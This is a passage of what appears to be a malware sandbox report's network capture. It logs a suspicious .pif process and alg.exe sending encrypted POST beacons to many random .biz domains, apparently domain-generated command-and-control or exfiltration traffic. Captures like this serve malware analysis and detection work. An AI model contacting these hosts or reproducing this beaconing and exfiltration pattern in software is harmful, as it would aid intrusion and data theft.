                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=a43794c3dcdcb55128637cedb8e8df09|173.254.250.82|1730445889|1730445889|0|1|0; path=/; domain=.tnevuluw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
125 | 192.168.2.8 | 49939 | 13.251.16.150 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:49.103034019 CET | 355 | OUT | POST /xgyulldvremqd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 1, 2024 08:24:49.103063107 CET | 778 | OUT | Data Raw: b1 3e 5a ec f8 3c 25 7e fe 02 00 00 18 18 e7 2a 9e fd bb 04 78 11 bf 23 ff 5b bd 75 a3 f7 f1 d9 b0 fb 7a de 39 b3 e1 1c db be 73 5e 4a f5 79 08 07 21 6b 44 6c b3 f2 81 5f f1 e1 dc d7 02 f5 a2 d3 c2 d4 ca ad ca 7e 05 74 34 a1 e6 ef a9 1c e8 ff fb
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: >Z<%~*x#[uz9s^Jy!kDl_~t4$?+3~V'/)O3\KcXc+jwtR4FwDi v^)})nGn'IwOyE?9K}~_A#y0l Vat;CbFk
Nov 1, 2024 08:24:50.536510944 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:50 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=83fe2dbfa7df9ed83ac9527f07d6eba7|173.254.250.82|1730445890|1730445890|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
126 | 192.168.2.8 | 49949 | 18.141.10.107 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:50.374330044 CET | 355 | OUT | POST /jhppqdqsxkpre HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: whjovd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:50.374361038 CET | 802 | OUT | Data Raw: 36 b0 35 3c 17 a4 d0 40 16 03 00 00 5d f9 a6 91 f2 98 c0 f1 3d ca 96 e9 39 2a e7 3a 48 4b 4b 8a de 49 7a d7 7f 25 d8 3a e2 df 8c 00 ed 46 9c 2d 82 d9 8e c3 80 94 f7 b3 77 6e 94 b5 a9 6d dc 36 ee d6 e3 12 41 64 06 89 9e 39 b2 47 9c 04 68 9f 30 b0
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 65<@]=9*:HKKIz%:F-wnm6Ad9Gh0pFBYnn?yRz'Z`VDIs\<L!'$C%go\$ g_SVPla5n9kJSh+<=4*?bggn8rL]
Nov 1, 2024 08:24:51.808725119 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=dc84dfb2ebb7d452d6e11bfbdcf1d970|173.254.250.82|1730445891|1730445891|0|1|0; path=/; domain=.whjovd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
127 | 192.168.2.8 | 49950 | 34.246.200.160 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:50.817914009 CET | 360 | OUT | POST /xsnbcmvbhjayqro HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 1, 2024 08:24:51.798132896 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=5d5390c066d984678f0dec645e5e8499|173.254.250.82|1730445891|1730445891|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
128 | 192.168.2.8 | 49956 | 208.100.26.245 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:51.830564022 CET | 356 | OUT | POST /myrpsocdgnp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:52.476258039 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 1, 2024 08:24:52.822515965 CET | 347 | OUT | POST /pm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:52.969079018 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:52 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
129 | 192.168.2.8 | 49962 | 18.141.10.107 | 80 | 4916 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:52.876780033 CET | 357 | OUT | POST /jntykoegrmymca HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.876791954 CET778OUTData Raw: 4f 33 02 92 9d 3b 51 ad fe 02 00 00 16 49 cf 08 9f 82 c3 02 97 da a8 8b 9f fb 7f 9f 27 52 ba bf f8 c7 c7 bb a5 9d 33 4e 96 e4 0c b1 48 bc df 88 03 b0 dd fd ad f6 79 cc 42 62 82 89 a9 69 1a 73 bd 16 62 8e 73 d2 62 5e f6 b4 4f e6 f4 19 ae 24 24 ca
Nov 1, 2024 08:24:54.305636883 CET  415  IN  HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e03f9d79a37ba0face86ee4a2dfb9132|173.254.250.82|1730445894|1730445894|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
130  192.168.2.8  49965  44.221.84.105  80  4536  C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp  Bytes transferred  Direction  Data
Nov 1, 2024 08:24:52.993845940 CET  355  OUT  POST /nwuwfpndyaon HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: reczwga.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:24:52.993869066 CET  802  OUT  Data Raw: 15 54 c2 67 5e b5 29 d6 16 03 00 00 33 a5 76 1e f1 69 50 03 44 96 14 fb d3 e7 0f 59 65 d0 85 39 89 d4 2b 5c cb d3 18 26 81 ec e1 70 6c 93 99 92 ef 0b 68 e9 3b 03 9b ba c6 d1 a5 66 32 4b ba 29 d9 49 1f 88 91 23 20 07 e4 df ba b4 04 17 e5 a6 f5 43
Nov 1, 2024 08:24:53.651650906 CET  415  IN  HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:53 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0382a81e8c4ffbecdb27a72995121f5d|173.254.250.82|1730445893|1730445893|0|1|0; path=/; domain=.reczwga.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
131  192.168.2.8  49969  34.211.97.45  80  4536  C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp  Bytes transferred  Direction  Data
Nov 1, 2024 08:24:53.678520918 CET  351  OUT  POST /tpnlrogxe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: bghjpy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:24:53.678536892 CET  802  OUT  Data Raw: 4c a3 5e d9 92 5b d2 ec 16 03 00 00 fa 86 30 7f 30 42 f7 62 95 0c 3a dc 00 21 76 58 17 df df a4 cc a8 bc 8e f4 2c b2 3c 4b 51 f3 08 35 e5 f4 b3 fd 4e 3a c8 de 04 6d 67 43 34 7c d6 d1 ab fc 0a 90 3c 4c 7e 8a 0d 9b 4f 4b 87 a1 23 36 d8 e0 8d 19 ea
Nov 1, 2024 08:24:54.510951042 CET  414  IN  HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1ce5ca8f8c2c0e7c08cb8617b68e70ad|173.254.250.82|1730445894|1730445894|0|1|0; path=/; domain=.bghjpy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
132  192.168.2.8  49975  18.208.156.248  80  4536  C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp  Bytes transferred  Direction  Data
Nov 1, 2024 08:24:54.532212019 CET  353  OUT  POST /gqjcfeax HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: damcprvgv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:24:54.532252073 CET  802  OUT  Data Raw: 70 92 e0 4a bc 44 41 fe 16 03 00 00 ca dc df 5c 2e 53 cc 8c 68 5a 51 f3 fb b2 df 8f e3 33 06 2e 48 6d 4c b2 03 14 39 ac dd 18 a5 e4 51 a3 6f 6b 2d 84 df fd 36 f3 6f ed d8 15 77 93 1e 52 0e 41 40 8c 42 3d 4b d5 24 f5 29 92 b4 d6 49 d9 21 7f cd 1d
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: pJDA\.ShZQ3.HmL9Qok-6owRA@B=K$)I!IgltR;v*t.7+w`l<]?NySMb"CHuzjkk&:rG|bV{Sp>#.P0x:%oRa8,'`jhM
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:55.197328091 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=06531049b15c17757c650d35665637e0|173.254.250.82|1730445895|1730445895|0|1|0; path=/; domain=.damcprvgv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
133 | 192.168.2.8 | 49976 | 13.251.16.150 | 80 | 4916 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:54.560185909 CET | 355 | OUT | POST /fxyeanegauuypg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gcedd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 1, 2024 08:24:54.560322046 CET | 778 | OUT | Data Raw: eb 25 f6 f6 d3 13 7c b3 fe 02 00 00 f3 96 f6 bf 5b b0 3c c7 e6 80 25 be 8b 22 e9 c4 3a b0 64 6e f3 70 61 48 9e f9 1a c9 c5 5a a1 f9 f3 6c f3 7e 4d d6 ac 98 78 18 ab 3e df 16 3a 0a 04 6f 3a df e1 e0 2c 1e 25 0e 63 76 e5 c1 52 df bb 88 c1 25 c9 ad
Data Ascii: %|[<%":dnpaHZl~Mx>:o:,%cvR%);C~N$,iP^~Gtj&=qn\(66XI./|VC$dkLn(R+'}Z)<Q7AU~S;8H<M7/K3
Nov 1, 2024 08:24:55.981276035 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:55 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=03e37d0e6e80d72762eddb505f975e14|173.254.250.82|1730445895|1730445895|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
134 | 192.168.2.8 | 49982 | 3.254.94.185 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif

Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:55.224277973 CET | 353 | OUT | POST /itmauuakdv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ocsvqjg.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Nov 1, 2024 08:24:55.224277973 CET | 802 | OUT | Data Raw: 09 79 b0 65 65 78 b6 8c 16 03 00 00 48 58 95 1e b3 c9 e2 32 bf 39 aa 83 14 31 9a 0b f9 83 f6 42 b8 8a 43 53 83 e2 ef e5 22 50 62 02 ec ba ee a7 6e f8 47 d0 cb e5 8a 42 dc bc 75 33 06 8b d1 73 f4 16 d5 f5 f0 7d 63 8b 7c e1 4c 9b cf 24 8a 5e 06 36
Data Ascii: yeexHX291BCS"PbnGBu3s}c|L$^6?D]U%y.[GE^v}{wc)K@b4vTFAN@L8RpsK;q)=nHRgu %sl gK]"pRk6'J
Nov 1, 2024 08:24:56.179537058 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 Nov 2024 07:24:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8b252a8947eee1a67848fe753c657be2|173.254.250.82|1730445896|1730445896|0|1|0; path=/; domain=.ocsvqjg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        135192.168.2.84998818.208.156.248804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.212687969 CET358OUTPOST /cqrtypmijgihv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.212754965 CET778OUTData Raw: 56 4e 2f 64 aa d7 48 3e fe 02 00 00 18 d1 15 c0 e7 56 4f 2d b4 f3 8c ff 43 41 17 51 0f 3f ac 4e b8 e3 39 23 3f 23 56 92 a0 0f 6d 75 ec fe 5f a7 1d 68 8b 7e 36 7e f0 55 cd 1b 5b 73 20 35 5e c6 5f f9 46 83 dc ac 2c ed 4f b6 fd 62 98 75 31 d1 d4 25
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: VN/dH>VO-CAQ?N9#?#Vmu_h~6~U[s 5^_F,Obu1%=4Im;B]Kr/Q{R}?Jjc>n]3,8h+).2bYJz*qidhY 4+W*I_*;.2r
Nov 1, 2024 08:24:56.882668972 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d5b1cc592213592483bc277028296529|173.254.250.82|1730445896|1730445896|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
136 | 192.168.2.8 | 49989 | 54.244.188.177 | 80 | 4536 | C:\Users\Public\Libraries\wdmvmswJ.pif
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 08:24:56.213047981 CET | 346 | OUT | POST /xcccv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ywffr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
Nov 1, 2024 08:24:56.213066101 CET | 802 | OUT | Data Raw: 8a f1 4b bc 5b 5b af e9 16 03 00 00 e2 4f 85 cd 22 15 ea 0c 37 c2 81 59 bb a9 98 d8 0a 00 91 2f 91 03 26 e7 51 3a ad 1d da 97 e4 44 94 3d 5e 4d ad ef 2b 13 f1 7f b1 9f 47 92 26 2e 86 cf 10 73 90 da 74 67 0a 92 61 86 0d 59 0a 67 fe 0b 0e 7f 9f c1
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: K[[O"7Y/&Q:D=^M+G&.stgaYgK~&A[u?'4P?wd(o0b$YZR,K--GMcMT7My{W0WiAG2:Rhj-r6~nVEV6}FK
Nov 1, 2024 08:24:57.029891968 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
